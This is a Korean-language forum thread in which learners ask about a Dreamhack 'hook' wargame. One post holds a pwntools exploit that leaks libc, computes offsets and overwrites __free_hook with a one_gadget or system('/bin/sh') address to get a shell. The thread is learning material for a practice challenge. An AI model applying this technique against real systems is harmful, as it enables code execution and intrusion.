hook

aslr이 적용되면 스택도 랜덤화 된다고 알 고 있습니다. 제가 혹시나 해서 freehook을 코드에 있는 system("/bin/sh")의 주소로 바꿨습니다. 그런데 잘 싱행되더라구요 aslr이 적용되면 랜덤화가 될텐데 왜 정상작동하는 건지 아시나요?? 0x0000000000400a11 <+199>: mov edi,0x400aeb 0x0000000000400a16 <+204>: call 0x400788 <system@plt> gdb로 까봤을 때 위와 같이 나오는데요 freehook 0x400a11로 덮었습니다.

image.png 두개 차이 뭔지 아시는 분 계시나여 문제에선 위에꺼 쓰던데 이유도 알려주시면 감사하겠습니다.

hook 워게임 과제하는 중인데 flag가 안나오는데 잘못된 부분이 있을까요? 직접 offset 구해서 hook overwrite를 하였는데 flag가 도출이 안됩니다. 도와주세요! 코드 from pwn import* p = remote("host1.dreamhack.games", 9373) e = ELF("./hook") libc = ELF("./libc.so.6") p.recvuntil("stdout: ") libc_stdout = int(p.recvuntil("\n").strip("\n"),16) libc_base = libc_stdout - 0x205760 malloc_hook = libc_base + 0x204c30 free_hook = libc_base + 0x2068e8 oneshot_gadget = libc_base + 0x4526a payload = p64(free_hook) + p64(oneshot_gadget) p.sendlineafter("Size: ", "400") p.sendlineafter("Data: ", payload) p.interactive() offset 구하는법 pwndbg> p &mallochook $1 = (void ()(sizet, const void )) 0x7ffff7dcdc30 <mallochook> pwndbg> p &freehook $2 = (void ()(void , const void )) 0x7ffff7dcf8e8 <freehook> pwndbg> vmmap libc LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 0x7ffff79e2000 0x7ffff7bc9000 r-xp 1e7000 0 /lib/x8664-linux-gnu/libc-2.27.so 0x7ffff7bc9000 0x7ffff7dc9000 ---p 200000 1e7000 /lib/x8664-linux-gnu/libc-2.27.so 0x7ffff7dc9000 0x7ffff7dcd000 r--p 4000 1e7000 /lib/x8664-linux-gnu/libc-2.27.so 0x7ffff7dcd000 0x7ffff7dcf000 rw-p 2000 1eb000 /lib/x8664-linux-gnu/libc-2.27.so pwndbg> p/x 0x7ffff7dcdc30 - 0x7ffff7bc9000 $3 = 0x204c30 pwndbg> p/x 0x7ffff7dcf8e8 - 0x7ffff7bc9000 $4 = 0x2068e8 pwndbg> quit hyunmin@WMRRD11-NC102M3:~/hyunmin/hook$ onegadget libc.so.6 0x45216 execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL 0x4526a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL 0xf02a4 execve("/bin/sh", rsp+0x50, environ) constraints: [rsp+0x50] == NULL 0xf1147 execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL 0x4526a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL 0xf02a4 execve("/bin/sh", rsp+0x50, environ) constraints: [rsp+0x50] == NULL 0xf1147 execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL* pwndbg> p stdout $1 = (struct IO_FILE *) 0x7ffff7dce760 <_IO_2_1_stdout> pwndbg> p/x 0x7ffff7dce760 - 0x7ffff7bc9000 $2 = 0x205760

free를 두번 호출 하면, 오류가 나서 종료하게 되는데, 이때 hook 함수가 불리는 것인지? 아니면 처음 호출해도 __free_hook가 호출되는지요? hook을 사용하기 위해서 컴파일 옵션을 주어야 하는것인지 궁금합니다.

free 두번 하면 에러가 발생하니까 free 후킹해서 다른 함수를 덮어쓰거나 의미 없게 만들어서 아래 system("/bin/sh") 실행시키거나 one_gadget으로 주소 찾아서 해당 주소 덮어 쓰기 이런 방식으로 접근하는게 맞나요?

안녕하세요. 해당 워게임을 풀이하던 중 2가지 궁금증이 생겨서 이렇게 질문을 남깁니다. free(ptr); free(ptr); system("/bin/sh"); 에서, free(ptr);이 2번 실행되는 대신에 __free_hook에 원가젯을 대입해서 바로 문제를 풀이하려고 했는데, 아래의 원가젯 중 첫번째 원가젯을 __free_hook이 가리키도록 했을 때만 익스플로잇이 가능했습니다. image.png image.png (해당 조건은 free가 실행되기 전 아래의 상태입니다. read(0, ptr, size)에서 제대로 된 주소를 넣어주지 않아서 segfault가 난건지 더이상 진행이 안되서 여기서 검사했습니다. 혹시 여기서 segfault가 안나게 gdb에서 입력을 해주는 팁이 있다면 알려주시면 감사드리겠습니다 ㅠㅠ) image.png 근데 여기서 셋다 조건을 만족하지 않는데, 첫번째 원가젯만 p.send(p64(free_hook) + p64(og))을 통해 전달했을 때 익스플로잇이 되는 이유가 무엇인지 궁금합니다. 그리고 사실 og 대신에 libc의 system, write, read 등 아무 함수나 넣어줘도 인자를 따로 설정해주지 않아도 아래의 system("/bin/sh");이 수행되는데 그 이유도 궁금합니다.. 풀이를 보면서 위 방법이 아닌 바이너리의 system("/bin/sh") 이 수행되도록 free_hook에 대입을 해주라는 것을 통해 아래와 같이 og 대신 0x400a11을 전달해주어서 익스플로잇을 성공하긴 했습니다. image.png 근데 여기서, 0x400a11은 PIE가 적용되지 않아서 고정된 가상 주소이기 때문에 전달이 가능하다는 것으로 유추하였는데 PIE가 적용되지 않은 경우 코드 영역의 베이스 주소를 구해서 0x400a11 대신 존재하는 가상 주소 오프셋을 더해줘야 하는건가요? PIE가 적용되어서 gdb에 나오는 가상 주소가 오프셋이더라도, 그걸 그대로 0x400a11 처럼 전달해주면 알아서 해당 코드가 존재하는 영역을 찾아가지 못하는 이유는 무엇인가요..?

*ptr[0]이 ptr[1]을 가리키게 하므로 ptr[0]에 __free_hook을 넣고 ptr[1]에 system을 넣으려 했습니다. ptr은 형식이 long이니까 ptr[0] 과 ptr[1]엔 각각 4바이트만큼의 공간만 할당된다고 생각했는데 그렇게 p32(__free_hook)랑 p32(system) 이렇게 send하니 에러가 떠서 p64로 패킹을 한번 바꿔봤더니 성공이네요 이해가 안되는건 처음 ptr을 선언했을때 long으로 선언했으니 4바이트만큼 할당되는 줄 알았는데..64비트체계에선 long이 8바이트 단위인가요? 아시는 분 도와주시면 정말 감사하겠습니다..ㅠ

process로해서 local에서는 잘되는데 문제 접속해서는 안됩니다. main에 system으로도 해보고 one_shot으로 해봐도 안되는데 따로 뭐가를 해야하나요 아니면 서버의 문제인가요?

문제 푸는 형식은 libc_base를 구하고 free_hook 주소를 계산 2-1. one_gadget을 이용하여 가젯을 사용하거나 2-2. main에 있는 system("/bin/sh") 호출하는 주소를 free_hook 포인터 변수에 담는다. 이런 식으로 풀었는데 문제는 페이로드 작성 후 send할 때 값이 원하는 의도대로 전달되지 않았습니다. payload = p64(free_hook) + p64(main_system) #혹은 one_gadget 처음에 위와 같이 페이로드를 작성하였습니다. free_hoox = 0x7fe5716318e8 main = 0x400a11 이라고 했을 때 malloc(size)로 할당받은 힙 영역에는 '\xe8\x18cq\xe5\x7f\x00\x00\x11\n@\x00\x00\x00\x00\x00' 이 들어가길 원했는데 맨 앞에 있는 '\xe8'이 없어지고 한 칸씩 앞으로 당겨진 값이 들어가졌습니다. 즉 '\x18cq\xe5\x7f\x00\x00\x11\n@\x00\x00\x00\x00\x00'이 들어가졌습니다. 그래서 원래 의도는 0x7fe5716318e8 주소에 0x400a11 값을 넣는거였는데 디버깅을 해보니 0x1100007fe5716318 주소를 참조하더라구요. 그래서 에러가 납니다. 그래서 일단은 페이로드 맨 앞에 '\x00'을 붙이니 성공하긴 하는데 왜 이런 일이 발생하는 지 궁금합니다. 아래는 attack.py 에서 제가 send를 이용해서 데이터 보낸 형식입니다. p.send(str(400)) p.send(payload) p.interactive() 질문 처음에는 스스로 풀었는데 계속 안되길래 다른 라이트업을 봐도 다들 저랑 비슷하게 작성했는데 왜 저만 이런 결과가 나오는 걸까요? 추가로 one_gadget이 여러 개 있던데, 어떤 건 되고 어떤 건 안됩니다. 예를 들어 로컬에서는 3번째 one_gadget_offset만 적용되고 원격에서는 2번째 one_gadget_offset만 적용이 됩니다. 그 이유를 알 수 있을까요?

pwnable one_shot 문제를 풀다보면 libc.so.6 파일을 같이 제공해줍니다. Exploit 코드를 로컬에서하면 libc_base 주소가 제대로 나오질 않고, 실패합니다. 하지만 그대로 서버에 적용하면 Exploit 성공합니다. 로컬에서도 적용하기 위해서 p = process('file', env = {'LD_PRELOAD' : '제공 libc'})를 하면 바로 EOFError로 끝나버립니다. 그래서 찾아본 것이 patchelf 를 봤는데 사용해봤습니다 ❯ ldd oneshot linux-vdso.so.1 (0x00007ffc38c2e000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe4679c5000) /lib64/ld-linux-x86-64.so.2 (0x00007fe467fb8000) /home/peoplstar/dreamhack/one_shot root@DESKTOP-7L9VV1C ❯ patchelf --replace-needed libc.so.6 ./libc.so.6 ./oneshot 이렇게 패치를 ./file 했을 때 바로 segmentation fault로 실행조차 안됩니다. pwnable에서 libc를 제공하면 어떻게 패치하고, 어떻게 로컬에서도 적용하는지 궁금합니다.